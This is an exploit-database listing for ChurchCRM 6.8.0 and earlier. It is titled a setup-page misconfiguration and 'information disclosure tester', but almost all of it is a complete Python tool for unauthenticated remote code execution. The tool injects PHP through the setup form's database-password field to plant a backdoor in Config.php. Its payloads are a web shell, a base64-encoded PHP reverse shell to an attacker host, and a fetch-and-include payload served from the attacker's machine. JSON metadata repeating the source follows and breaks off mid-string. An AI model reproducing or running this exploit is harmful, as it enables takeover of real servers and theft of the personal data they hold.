📄 ChurchCRM 6.8.0 Information Disclosure Tester_PACKETSTORM:215793

Description

ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. This...

Visit Original Source

Basic Information

ID PACKETSTORM:215793

Published Feb 18, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : ChurchCRM ≤ 6.8.0 – Setup Page Security Misconfiguration |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits) |
| # Vendor : https://github.com/ChurchCRM/ |
=============================================================================================================================================

[+] Summary : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions.
If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters.
This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations.
Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.
[+] POC :

#!/usr/bin/env python3

import argparse
import base64
import random
import string
import sys
import time
import logging
import re
import socket
import threading
import http.server
import socketserver
from urllib.parse import urljoin, urlparse, quote
from typing import Optional, Dict, Any, Tuple, List, Union
from dataclasses import dataclass, field
from enum import Enum
from functools import wraps
import json
import requests
from requests.exceptions import RequestException
from requests.adapters import HTTPAdapter
from urllib3.util.retry import Retry

VERSION = "2.0.0"
USER_AGENT = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
TIMEOUT = 30
MAX_RETRIES = 3
DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch']

class ExploitError(Exception):
"""Base exception for exploit errors"""
pass

class TargetUnreachableError(ExploitError):
"""Target is not reachable"""
pass

class InjectionFailedError(ExploitError):
"""Failed to inject payload"""
pass

class PayloadServerError(ExploitError):
"""Payload server error"""
pass

class VersionDetectionError(ExploitError):
"""Version detection error"""
pass
class TargetType(Enum):
"""Target platform types"""
LINUX_CMD_STAGER = "linux_cmd_stager"
PHP_MEMORY = "php_memory"
PHP_FETCH = "php_fetch"

class CheckCode(Enum):
"""Check result codes"""
SAFE = "safe"
VULNERABLE = "vulnerable"
UNKNOWN = "unknown"
UNREACHABLE = "unreachable"

@dataclass
class TargetInfo:
"""Target information"""
url: str
base_path: str
scheme: str
host: str
port: int
version: Optional[str] = None
vulnerable: Optional[bool] = None
detected_paths: List[str] = field(default_factory=list)

@dataclass
class ExploitResult:
"""Exploit result"""
success: bool
session: Optional[requests.Session] = None
message: str = ""
target: Optional[TargetInfo] = None
output: Optional[str] = None

class Version:
"""Advanced version handling"""

def __init__(self, version_string: str):
self.original = version_string
self.clean = self._clean_version(version_string)
self.parts = self._parse_parts(self.clean)
self.suffix = self._extract_suffix(version_string)

def _clean_version(self, version: str) -> str:
"""Clean version string"""

match = re.search(r'(\d+\.\d+(?:\.\d+)?)', version)
return match.group(1) if match else '0.0.0'

def _parse_parts(self, version: str) -> List[int]:
"""Parse version into integer parts"""
parts = []
for part in version.split('.'):
try:
parts.append(int(part))
except ValueError:
parts.append(0)
return parts

def _extract_suffix(self, version: str) -> str:
"""Extract suffix (e.g., -beta2, -RC1)"""
match = re.search(r'[-_]([a-zA-Z]+\d*)$', version)
return match.group(1) if match else ''

def __lt__(self, other: Union[str, 'Version']) -> bool:
"""Less than comparison"""
if isinstance(other, str):
other = Version(other)
for i in range(max(len(self.parts), len(other.parts))):
v1 = self.parts[i] if i < len(self.parts) else 0
v2 = other.parts[i] if i < len(other.parts) else 0

if v1 < v2:
return True
if v1 > v2:
return False

if self.suffix and not other.suffix:
return True # Has suffix is considered older
if not self.suffix and other.suffix:
return False

return False

def __le__(self, other: Union[str, 'Version']) -> bool:
"""Less than or equal"""
return self < other or self == other

def __eq__(self, other: Union[str, 'Version']) -> bool:
"""Equal comparison"""
if isinstance(other, str):
other = Version(other)
return self.parts == other.parts and self.suffix == other.suffix

def __str__(self) -> str:
return self.original

def __repr__(self) -> str:
return f"Version('{self.original}')"

def safe_urljoin(base: str, path: str) -> str:
"""
Safely join URL parts handling base paths correctly

Examples:
>>> safe_urljoin('http://example.com/churchcrm', '/setup/')
'http://example.com/churchcrm/setup/'
>>> safe_urljoin('http://example.com/churchcrm/', 'setup/')
'http://example.com/churchcrm/setup/'
"""
base = base.rstrip('/')

if path.startswith('/'):
parsed = urlparse(base)
base_without_path = f"{parsed.scheme}://{parsed.netloc}"
base_path = parsed.path.rstrip('/')
return f"{base_without_path}{base_path}{path}"
else:
return f"{base}/{path.lstrip('/')}"

def normalize_url(url: str) -> str:
"""Normalize URL by adding scheme if missing and removing trailing slash"""
if not url.startswith(('http://', 'https://')):
url = 'http://' + url
return url.rstrip('/')

def parse_target(url: str) -> TargetInfo:
"""Parse target URL and return TargetInfo"""
url = normalize_url(url)
parsed = urlparse(url)

return TargetInfo(
url=url,
base_path=parsed.path.rstrip('/') or '/',
scheme=parsed.scheme,
host=parsed.hostname,
port=parsed.port or (443 if parsed.scheme == 'https' else 80),
)

def discover_base_path(session: requests.Session, base_url: str,
paths: List[str] = None, logger: logging.Logger = None) -> Optional[str]:
"""
Discover the correct base path by trying common paths
"""
if paths is None:
paths = DEFAULT_PATHS

parsed = urlparse(base_url)
base = f"{parsed.scheme}://{parsed.netloc}"

for path in paths:
test_url = f"{base}{path}" if path else base
try:
setup_url = safe_urljoin(test_url, '/setup/')
if logger:
logger.debug(f"Trying path: {setup_url}")

response = session.get(setup_url, timeout=5, allow_redirects=False)

if response.status_code in [200, 301, 302]:
if logger:
logger.info(f"Found ChurchCRM at: {test_url}")
return test_url
except:
continue

return None

class ColoredFormatter(logging.Formatter):
"""Custom formatter with colors"""

COLORS = {
'DEBUG': '\033[36m',
'INFO': '\033[32m',
'WARNING': '\033[33m',
'ERROR': '\033[31m',
'CRITICAL': '\033[35m',
'RESET': '\033[0m'
}

def format(self, record):
levelname = record.levelname
if levelname in self.COLORS:
record.levelname = f"{self.COLORS[levelname]}{levelname}{self.COLORS['RESET']}"
return super().format(record)

def setup_logger(debug: bool = False) -> logging.Logger:
"""Setup logger with appropriate configuration"""
logger = logging.getLogger('churchcrm_exploit')
logger.setLevel(logging.DEBUG if debug else logging.INFO)

if not logger.handlers:
handler = logging.StreamHandler(sys.stdout)
formatter = ColoredFormatter(
'%(asctime)s [%(levelname)s] %(message)s',
datefmt='%H:%M:%S'
)
handler.setFormatter(formatter)
logger.addHandler(handler)

return logger

def create_session(retries: int = MAX_RETRIES) -> requests.Session:
"""Create requests session with retry logic"""
session = requests.Session()

retry_strategy = Retry(
total=retries,
backoff_factor=0.5,
status_forcelist=[500, 502, 503, 504],
allowed_methods=["HEAD", "GET", "OPTIONS", "POST"]
)

adapter = HTTPAdapter(max_retries=retry_strategy)
session.mount("http://", adapter)
session.mount("https://", adapter)

session.headers.update({
'User-Agent': USER_AGENT,
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzip, deflate',
'Connection': 'keep-alive',
})

return session

def random_string(length: int = 8) -> str:
"""Generate random string"""
return ''.join(random.choices(string.ascii_lowercase, k=length))

def random_int_string(min_len: int = 5, max_len: int = 10) -> str:
"""Generate random integer as string"""
length = random.randint(min_len, max_len)
return ''.join(random.choices(string.digits, k=length))

def random_url() -> str:
"""Generate random URL"""
return f"http://{random_string(8)}.com/"

class PayloadHandler(http.server.SimpleHTTPRequestHandler):
"""HTTP handler for serving payloads"""

payload = None
logger = None
request_count = 0

def do_GET(self):
"""Handle GET request"""
PayloadHandler.request_count += 1

if self.logger:
self.logger.debug(f"Payload request #{PayloadHandler.request_count} from {self.client_address[0]}")

if self.payload:
self.send_response(200)
self.send_header('Content-Type', 'application/x-httpd-php')
self.send_header('Content-Length', str(len(self.payload)))
self.send_header('Pragma', 'no-cache')
self.send_header('Cache-Control', 'no-cache, no-store, must-revalidate')
self.end_headers()
self.wfile.write(self.payload.encode())

if self.logger:
self.logger.info(f"Served payload to {self.client_address[0]}")
else:
self.send_response(404)
self.end_headers()

def log_message(self, format, *args):
"""Override to use our logger"""
if self.logger and self.logger.isEnabledFor(logging.DEBUG):
self.logger.debug(f"Payload server: {format % args}")

class PayloadServer:
"""HTTP server for serving payloads"""

def __init__(self, logger: logging.Logger, host: str = '0.0.0.0', port: int = 0):
self.logger = logger
self.host = host
self.port = port
self.server = None
self.thread = None
self.payload = None

def start(self, payload: str) -> str:
"""Start payload server and return URL"""
self.payload = payload
PayloadHandler.payload = payload
PayloadHandler.logger = self.logger
PayloadHandler.request_count = 0
self.server = socketserver.TCPServer((self.host, self.port), PayloadHandler, bind_and_activate=False)
self.server.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.server.server_bind()
self.server.server_activate()
self.port = self.server.server_address[1]
self.thread = threading.Thread(target=self.server.serve_forever)
self.thread.daemon = True
self.thread.start()

server_url = f"http://{self.get_local_ip()}:{self.port}/"
self.logger.info(f"Payload server started at {server_url}")

return server_url

def stop(self):
"""Stop payload server"""
if self.server:
self.server.shutdown()
self.server.server_close()
self.logger.debug(f"Payload server stopped (served {PayloadHandler.request_count} requests)")

def get_local_ip(self) -> str:
"""Get local IP address"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect(('10.255.255.255', 1))
ip = s.getsockname()[0]
except Exception:
ip = '127.0.0.1'
finally:
s.close()
return ip

def wait_for_requests(self, timeout: int = 10) -> bool:
"""Wait for at least one request"""
start = time.time()
while time.time() - start < timeout:
if PayloadHandler.request_count > 0:
return True
time.sleep(0.5)
return False

class VersionDetector:
"""Detect ChurchCRM version from response"""

def __init__(self, logger: logging.Logger):
self.logger = logger
self.patterns = [
(re.compile(r'CRM-VERSION:\s*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'header'),
(re.compile(r'<meta[^>]*name=["\']version["\'][^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'meta'),
(re.compile(r'<meta[^>]*content=["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)[^>]*name=["\']version', re.I), 'meta'),
(re.compile(r'<!--\s*ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'comment'),
(re.compile(r'ChurchCRM[^\d]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'footer'),
(re.compile(r'window\.ChurchCRM\s*=\s*\{[^}]*version:\s*["\']([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'js'),
(re.compile(r'"softwareVersion"\s*:\s*"([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'json'),
(re.compile(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', re.I), 'php'),
]

def detect(self, response: requests.Response) -> Optional[Version]:
"""Detect version from response"""
detected_versions = []

if 'CRM-VERSION' in response.headers:
version = self._clean_version(response.headers['CRM-VERSION'])
if version:
self.logger.debug(f"Version found in header: {version}")
detected_versions.append(('header', version))

if 'X-Powered-By' in response.headers:
match = re.search(r'ChurchCRM[\/\s-]*([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)',
response.headers['X-Powered-By'], re.I)
if match:
version = self._clean_version(match.group(1))
if version:
self.logger.debug(f"Version found in X-Powered-By: {version}")
detected_versions.append(('x-powered', version))

for pattern, source in self.patterns:
matches = pattern.findall(response.text)
for match in matches:
if isinstance(match, tuple):
match = match[0]
version = self._clean_version(match)
if version:
self.logger.debug(f"Version found in {source}: {version}")
detected_versions.append((source, version))

if not detected_versions:
return None

version_counts = {}
for source, version in detected_versions:
version_str = str(version)
version_counts[version_str] = version_counts.get(version_str, 0) + 1

most_common = max(version_counts.items(), key=lambda x: x[1])
self.logger.debug(f"Most common version: {most_common[0]} (appears {most_common[1]} times)")

return Version(most_common[0])

def _clean_version(self, version: str) -> Optional[Version]:
"""Clean and validate version string"""
version = version.strip()

match = re.search(r'([0-9]+\.[0-9]+(?:\.[0-9]+)?(?:-[a-zA-Z0-9.]+)?)', version)
if match:
return Version(match.group(1))

return None

def is_vulnerable(self, version: Optional[Version]) -> Optional[bool]:
"""Check if version is vulnerable using enhanced comparison"""
if not version:
return None

try:

vulnerable = version <= '6.8.0'

self.logger.debug(f"Version {version} <= 6.8.0? {vulnerable}")
return vulnerable

except Exception as e:
self.logger.error(f"Version comparison error: {e}")
return None

class ChurchCRMExploit:
"""ChurchCRM RCE Exploit"""

def __init__(self, target_url: str, logger: logging.Logger,
target_type: TargetType = TargetType.LINUX_CMD_STAGER,
lhost: Optional[str] = None, lport: Optional[int] = None,
payload: Optional[str] = None, verify_ssl: bool = True,
proxy: Optional[str] = None, auto_discover: bool = True):

self.logger = logger
self.original_url = target_url
self.target_type = target_type
self.lhost = lhost
self.lport = lport
self.custom_payload = payload
self.verify_ssl = verify_ssl
self.proxy = proxy
self.auto_discover = auto_discover
self.session = create_session()
self.payload_server = None
self.version_detector = VersionDetector(logger)
self.backdoor_injected = False

if proxy:
self.session.proxies = {'http': proxy, 'https': proxy}

self.target = self._initialize_target(target_url)

def _initialize_target(self, target_url: str) -> TargetInfo:
"""Initialize target with optional path discovery"""

try:
info = parse_target(target_url)

test_url = safe_urljoin(info.url, '/setup/')
response = self.session.get(test_url, timeout=5, verify=self.verify_ssl, allow_redirects=False)

if response.status_code in [200, 301, 302]:
self.logger.info(f"Target URL working: {info.url}")
info.detected_paths.append(info.base_path)
return info
except:
pass

if self.auto_discover:
self.logger.info("Direct URL not working, attempting path discovery...")
discovered = discover_base_path(self.session, target_url, logger=self.logger)

if discovered:
info = parse_target(discovered)
info.detected_paths = DEFAULT_PATHS
self.logger.info(f"Discovered ChurchCRM at: {info.url}")
return info
return parse_target(target_url)

def check(self) -> Dict[str, Any]:
"""Check if target is vulnerable"""
self.logger.info(f"Checking target: {self.target.url}")

try:

url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Accessing {url}")

response = self.session.get(
url,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=True
)

self.logger.debug(f"Response code: {response.status_code}")

if response.status_code not in [200, 301, 302]:
self.logger.warning(f"Unexpected response code: {response.status_code}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Setup page returned HTTP {response.status_code}'
}

version = self.version_detector.detect(response)

if version:
self.logger.info(f"Detected ChurchCRM version: {version}")
vulnerable = self.version_detector.is_vulnerable(version)
self.target.version = str(version)
self.target.vulnerable = vulnerable

if vulnerable:
self.logger.warning("Target appears VULNERABLE!")
return {
'code': CheckCode.VULNERABLE,
'version': str(version),
'message': f'Vulnerable version {version} detected'
}
else:
self.logger.info("Target appears NOT vulnerable")
return {
'code': CheckCode.SAFE,
'version': str(version),
'message': f'Version {version} is not vulnerable'
}
else:
self.logger.warning("Could not detect version")
return {
'code': CheckCode.UNKNOWN,
'message': 'Version unknown - setup page accessible'
}

except RequestException as e:
self.logger.error(f"Request failed: {e}")
return {
'code': CheckCode.UNREACHABLE,
'message': f'Target unreachable: {e}'
}

def build_payload(self) -> str:
"""Build payload based on target type"""
prefix = f"{random_string(3)}';"

if self.target_type == TargetType.PHP_MEMORY:

if self.custom_payload:
php_payload = self.custom_payload
else:

php_payload = self._generate_reverse_shell()

b64_payload = base64.b64encode(php_payload.encode()).decode()
return f"{prefix} eval(base64_decode(\"{b64_payload}\")); //"

elif self.target_type == TargetType.PHP_FETCH:

if not self.payload_server:
raise PayloadServerError("Payload server not started")

payload_name = f"/tmp/{random_string(8)}.php"
server_url = f"http://{self.lhost}:{self.payload_server.port}/"

return (f"{prefix} $f='{payload_name}'; "
f"file_put_contents($f, file_get_contents('{server_url}')); "
f"register_shutdown_function('unlink', $f); include($f); //")

else:

return f"{prefix} system($_GET['cmd']); //"

def _generate_reverse_shell(self) -> str:
"""Generate PHP reverse shell"""
if not self.lhost or not self.lport:
return "phpinfo();"

return f"""<?php

$lhost = '{self.lhost}';
$lport = {self.lport};

if (function_exists('fsockopen') && function_exists('proc_open')) {{
$sock = @fsockopen($lhost, $lport);
if ($sock) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}

if (function_exists('socket_create') && function_exists('proc_open')) {{
$sock = @socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if ($sock && @socket_connect($sock, $lhost, $lport)) {{
$descriptors = array(
0 => $sock,
1 => $sock,
2 => $sock
);
$process = proc_open((PHP_OS == 'WINNT' ? 'cmd' : '/bin/sh'), $descriptors, $pipes);
proc_close($process);
}}
}}
?>"""

def inject_backdoor(self) -> bool:
"""Inject backdoor via setup page"""
self.logger.info("Injecting backdoor into Include/Config.php...")

payload = self.build_payload()

post_data = {
'DB_SERVER_NAME': random_string(8),
'DB_SERVER_PORT': '3306',
'DB_NAME': random_string(8),
'DB_USER': random_string(6),
'DB_PASSWORD': payload,
'ROOT_PATH': '/',
'URL': random_url()
}

self.logger.debug(f"POST data prepared (password field contains payload)")

try:
url = safe_urljoin(self.target.url, '/setup/')
self.logger.debug(f"Sending POST to {url}")

response = self.session.post(
url,
data=post_data,
timeout=TIMEOUT,
verify=self.verify_ssl,
allow_redirects=False
)

if response.status_code == 200:
self.logger.info("Backdoor injected successfully!")
self.backdoor_injected = True
return True
else:
self.logger.error(f"Injection failed with HTTP {response.status_code}")
return False

except RequestException as e:
self.logger.error(f"Injection request failed: {e}")
return False

def execute_command(self, cmd: str) -> Optional[str]:
"""Execute command on target"""
if not self.backdoor_injected:
self.logger.warning("Backdoor not injected yet. Attempting injection...")
if not self.inject_backdoor():
self.logger.error("Cannot execute command: backdoor injection failed")
return None

self.logger.info(f"Executing command: {cmd}")

try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Command URL: {url}?cmd={quote(cmd)}")

response = self.session.get(
url,
params={'cmd': cmd},
timeout=TIMEOUT,
verify=self.verify_ssl
)

if response.status_code == 200:

output = response.text.strip()

if '<html' in output.lower():

body_match = re.search(r'<body[^>]*>(.*?)</body>', output, re.S | re.I)
if body_match:
output = body_match.group(1).strip()

output = re.sub(r'<[^>]+>', ' ', output)
output = re.sub(r'\s+', ' ', output).strip()

return output
else:
self.logger.error(f"Command execution failed with HTTP {response.status_code}")
return None

except RequestException as e:
self.logger.error(f"Command execution request failed: {e}")
return None

def cleanup(self) -> bool:
"""Clean up - remove backdoor"""
if not self.backdoor_injected:
self.logger.debug("No backdoor to clean up")
return True

self.logger.info("Cleaning up...")

commands = [
'rm -f Include/Config.php',
'rm Include/Config.php',
'rm -f churchcrm/Include/Config.php',
'del /f Include\\Config.php',
'php -r "unlink(\'Include/Config.php\');"',
'php -r "unlink(\'churchcrm/Include/Config.php\');"'
]

success = False
for cmd in commands:
result = self.execute_command(cmd)
if result is not None: # Command executed (even if file doesn't exist)
self.logger.debug(f"Cleanup command executed: {cmd}")
success = True

if success:
self.logger.info("Cleanup completed")
self.backdoor_injected = False
else:
self.logger.warning("Cleanup may have failed")

return success

def run_cmd_stager(self, cmd: str) -> Tuple[bool, Optional[str]]:
"""Run command stager"""
output = self.execute_command(cmd)
return (output is not None, output)

def run_php_memory(self) -> Tuple[bool, Optional[str]]:
"""Run PHP in-memory payload"""
self.logger.info("Executing PHP in-memory payload...")

try:
url = safe_urljoin(self.target.url, '/')
self.logger.debug(f"Triggering payload via GET to {url}")

response = self.session.get(url, timeout=TIMEOUT, verify=self.verify_ssl)

if response.status_code == 200:
self.logger.info("PHP payload executed successfully")

return (True, response.text[:500] + "..." if len(response.text) > 500 else response.text)
else:
self.logger.error(f"PHP execution failed with HTTP {response.status_code}")
return (False, None)

except RequestException as e:
self.logger.error(f"PHP execution request failed: {e}")
return (False, None)

def run_php_fetch(self) -> Tuple[bool, Optional[str]]:
"""Run PHP fetch payload"""
self.logger.info("Executing PHP fetch payload...")

self.payload_server = PayloadServer(self.logger, host='0.0.0.0')

if self.custom_payload:
payload = self.custom_payload
else:
payload = self._generate_reverse_shell()

try:
server_url = self.payload_server.start(payload)
self.logger.info(f"Serving payload from {server_url}")

time.sleep(2)

if self.inject_backdoor():
self.logger.info("Waiting for payload request...")

if self.payload_server.wait_for_requests(timeout=30):
self.logger.info("Payload was fetched by target")

time.sleep(5)
success = True
else:
self.logger.warning("No payload request received")
success = False
else:
success = False

return (success, None)

finally:
self.payload_server.stop()

def exploit(self) -> ExploitResult:
"""Main exploit method"""
self.logger.info(f"Starting exploit against {self.target.url}")
self.logger.info(f"Target type: {self.target_type.value}")

check_result = self.check()

if check_result['code'] == CheckCode.UNREACHABLE:
return ExploitResult(
success=False,
message=f"Target unreachable: {check_result['message']}"
)

if check_result['code'] == CheckCode.SAFE:
return ExploitResult(
success=False,
message=check_result['message']
)

if not self.inject_backdoor():
return ExploitResult(
success=False,
message="Failed to inject backdoor"
)

success = False
output = None

if self.target_type == TargetType.LINUX_CMD_STAGER:
if self.custom_payload:
success, output = self.run_cmd_stager(self.custom_payload)
else:

success, output = self.run_cmd_stager('id')
if success and output:
self.logger.info(f"Command output: {output.strip()}")

elif self.target_type == TargetType.PHP_MEMORY:
success, output = self.run_php_memory()

elif self.target_type == TargetType.PHP_FETCH:
success, output = self.run_php_fetch()

self.cleanup()

return ExploitResult(
success=success,
message="Exploit completed successfully" if success else "Exploit failed",
target=self.target,
output=output
)

def main():
"""Main entry point"""
parser = argparse.ArgumentParser(
description='ChurchCRM Unauthenticated RCE Exploit by indoushka',
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="""
Examples:
# Check vulnerability
%(prog)s http://target.com/churchcrm --check

# Execute command
%(prog)s http://target.com --cmd "id"

# Reverse shell (Linux)
%(prog)s http://target.com --reverse 192.168.1.100 4444

# Reverse shell with PHP fetch method
%(prog)s http://target.com --type php-fetch --reverse 192.168.1.100 4444

# Custom PHP payload
%(prog)s http://target.com --payload "<?php phpinfo(); ?>"

# With proxy and debug
%(prog)s http://target.com --check --proxy http://127.0.0.1:8080 --debug

Exit codes:
0 - Not vulnerable / Success
1 - Error / Unknown
2 - Vulnerable
"""
)

parser.add_argument('target', help='Target URL (e.g., http://target.com/churchcrm)')

parser.add_argument('--check', action='store_true', help='Check if target is vulnerable')
parser.add_argument('--cmd', metavar='COMMAND', help='Execute command')
parser.add_argument('--reverse', nargs=2, metavar=('LHOST', 'LPORT'),
help='Reverse shell (LHOST LPORT)')
parser.add_argument('--payload', metavar='CODE', help='Custom PHP payload')
parser.add_argument('--payload-file', metavar='FILE', help='PHP payload file')
parser.add_argument('--type', choices=['linux', 'php-memory', 'php-fetch'],
default='linux', help='Target type (default: linux)')
parser.add_argument('--proxy', help='HTTP proxy (e.g., http://127.0.0.1:8080)')
parser.add_argument('--no-verify', action='store_true', help='Disable SSL verification')
parser.add_argument('--debug', action='store_true', help='Enable debug output')
parser.add_argument('--no-discover', action='store_true',
help='Disable automatic path discovery')

args = parser.parse_args()

logger = setup_logger(args.debug)

if not any([args.check, args.cmd, args.reverse, args.payload, args.payload_file]):
logger.error("No action specified. Use --help for usage.")
sys.exit(1)

target_type_map = {
'linux': TargetType.LINUX_CMD_STAGER,
'php-memory': TargetType.PHP_MEMORY,
'php-fetch': TargetType.PHP_FETCH
}
target_type = target_type_map[args.type]

payload = None
if args.payload:
payload = args.payload
elif args.payload_file:
try:
with open(args.payload_file, 'r') as f:
payload = f.read()
except Exception as e:
logger.error(f"Failed to read payload file: {e}")
sys.exit(1)

try:
exploit = ChurchCRMExploit(
target_url=args.target,
logger=logger,
target_type=target_type,
lhost=args.reverse[0] if args.reverse else None,
lport=int(args.reverse[1]) if args.reverse else None,
payload=payload,
verify_ssl=not args.no_verify,
proxy=args.proxy,
auto_discover=not args.no_discover
)
except Exception as e:
logger.error(f"Failed to initialize exploit: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)

try:
if args.check:
result = exploit.check()
if result['code'] == CheckCode.VULNERABLE:
logger.warning(f"Target is VULNERABLE! Version: {result.get('version', 'unknown')}")
sys.exit(2)
elif result['code'] == CheckCode.SAFE:
logger.info("Target is NOT vulnerable")
sys.exit(0)
else:
logger.warning(f"Unknown status: {result['message']}")
sys.exit(1)

elif args.cmd:
logger.info(f"Executing command: {args.cmd}")

if exploit.target_type != TargetType.LINUX_CMD_STAGER:
logger.warning(f"Switching target type from {exploit.target_type.value} to linux_cmd_stager")
exploit.target_type = TargetType.LINUX_CMD_STAGER

result = exploit.exploit()
if result.success and result.output:
print("\n" + "="*60)
print("COMMAND OUTPUT:")
print("="*60)
print(result.output)
print("="*60)
elif result.success:
print("\nCommand executed successfully (no output)")
else:
logger.error(f"Command execution failed: {result.message}")
sys.exit(1)

elif args.reverse:
logger.info(f"Attempting reverse shell to {args.reverse[0]}:{args.reverse[1]}")

if args.type == 'php-fetch':
exploit.target_type = TargetType.PHP_FETCH
elif args.type == 'php-memory':
exploit.target_type = TargetType.PHP_MEMORY
else:
exploit.target_type = TargetType.LINUX_CMD_STAGER

result = exploit.exploit()

if result.success:
logger.info("Reverse shell payload sent. Check your listener!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Reverse shell failed: {result.message}")
sys.exit(1)

else:
result = exploit.exploit()
if result.success:
logger.info("Exploit completed successfully!")
if result.output:
print(f"\nOutput: {result.output}")
else:
logger.error(f"Exploit failed: {result.message}")
sys.exit(1)

except KeyboardInterrupt:
logger.info("Interrupted by user")
sys.exit(130)
except Exception as e:
logger.error(f"Unexpected error: {e}")
if args.debug:
import traceback
traceback.print_exc()
sys.exit(1)

if __name__ == '__main__':
main()

Greetings to :======================================================================
jericho * Larry W. Cashdollar * r00t * Hussin-X * Malvuln (John Page aka hyp3rlinx)|
====================================================================================

{
    "lastseen": "2026-02-18T17:38:11",
    "description": "ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. This...",
    "published": "2026-02-18T00:00:00",
    "modified": "2026-02-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 ChurchCRM 6.8.0 Information Disclosure Tester",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215793",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : ChurchCRM \u2264 6.8.0 \u2013 Setup Page Security Misconfiguration                                                                    |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.3 (64 bits)                                                            |\n    | # Vendor    : https://github.com/ChurchCRM/                                                                                               |\n    =============================================================================================================================================\n    \n    [+] Summary    : ChurchCRM versions 6.8.0 and earlier expose the installation setup endpoint without proper access restrictions. \n                     If the setup process remains accessible after deployment, it may allow unauthorized users to interact with configuration parameters. \n    \t\t\t\t This misconfiguration increases the risk of exploitation in unpatched or improperly secured installations. \n                     Administrators are advised to disable or restrict access to the setup directory after installation and update to the latest secure version.\n    [+] POC : \n    \n    #!/usr/bin/env python3\n    \n    import argparse\n    import base64\n    import random\n    import string\n    import sys\n    import time\n    import logging\n    import re\n    import socket\n    import threading\n    import http.server\n    import socketserver\n    from urllib.parse import urljoin, urlparse, quote\n    from typing import Optional, Dict, Any, Tuple, List, Union\n    from dataclasses import dataclass, field\n    from enum import Enum\n    from functools import wraps\n    import json\n    import requests\n    from requests.exceptions import RequestException\n    from requests.adapters import HTTPAdapter\n    from urllib3.util.retry import Retry\n    \n    VERSION = \"2.0.0\"\n    USER_AGENT = \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36\"\n    TIMEOUT = 30\n    MAX_RETRIES = 3\n    DEFAULT_PATHS = ['', '/churchcrm', '/crm', '/church', '/crmchurch']\n    \n    class ExploitError(Exception):\n        \"\"\"Base exception for exploit errors\"\"\"\n        pass\n    \n    \n    class TargetUnreachableError(ExploitError):\n        \"\"\"Target is not reachable\"\"\"\n        pass\n    \n    \n    class InjectionFailedError(ExploitError):\n        \"\"\"Failed to inject payload\"\"\"\n        pass\n    \n    \n    class PayloadServerError(ExploitError):\n        \"\"\"Payload server error\"\"\"\n        pass\n    \n    \n    class VersionDetectionError(ExploitError):\n        \"\"\"Version detection error\"\"\"\n        pass\n    class TargetType(Enum):\n        \"\"\"Target platform types\"\"\"\n        LINUX_CMD_STAGER = \"linux_cmd_stager\"\n        PHP_MEMORY = \"php_memory\"\n        PHP_FETCH = \"php_fetch\"\n    \n    \n    class CheckCode(Enum):\n        \"\"\"Check result codes\"\"\"\n        SAFE = \"safe\"\n        VULNERABLE = \"vulnerable\"\n        UNKNOWN = \"unknown\"\n        UNREACHABLE = \"unreachable\"\n    \n    \n    @dataclass\n    class TargetInfo:\n        \"\"\"Target information\"\"\"\n        url: str\n        base_path: str\n        scheme: str\n        host: str\n        port: int\n        version: Optional[str] = None\n        vulnerable: Optional[bool] = None\n        detected_paths: List[str] = field(default_factory=list)\n    \n    \n    @dataclass\n    class ExploitResult:\n        \"\"\"Exploit result\"\"\"\n        success: bool\n        session: Optional[requests.Session] = None\n        message: str = \"\"\n        target: Optional[TargetInfo] = None\n        output: Optional[str] = None\n    \n    class Version:\n        \"\"\"Advanced version handling\"\"\"\n        \n        def __init__(self, version_string: str):\n            self.original = version_string\n            self.clean = 